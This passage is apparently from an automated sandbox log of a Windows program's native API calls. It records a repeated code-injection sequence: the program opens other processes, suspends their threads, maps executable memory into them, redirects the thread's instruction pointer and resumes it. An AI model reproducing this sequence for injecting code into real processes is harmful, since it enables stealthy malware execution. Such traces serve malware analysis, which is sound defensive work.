[232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.236] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.236] NtClose (Handle=0x1a4) returned 0x0 [0138.236] NtClose (Handle=0x1a0) returned 0x0 [0138.238] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1144, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0138.238] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.238] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.238] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x322000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.238] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0138.437] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1148) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0138.437] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0138.437] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21e0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0138.458] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x322000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.462] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0138.462] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x130200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x131000) returned 0x0 [0138.471] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x130200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5b0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x131000) returned 0x0 [0138.517] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0138.525] NtClose (Handle=0x1a8) returned 0x0 [0138.525] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x322000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x64d717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.529] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.530] NtClose (Handle=0x1a0) returned 0x0 [0138.530] NtClose (Handle=0x1a4) returned 0x0 [0138.531] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1154, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0138.531] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.531] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.531] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x2d4000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, 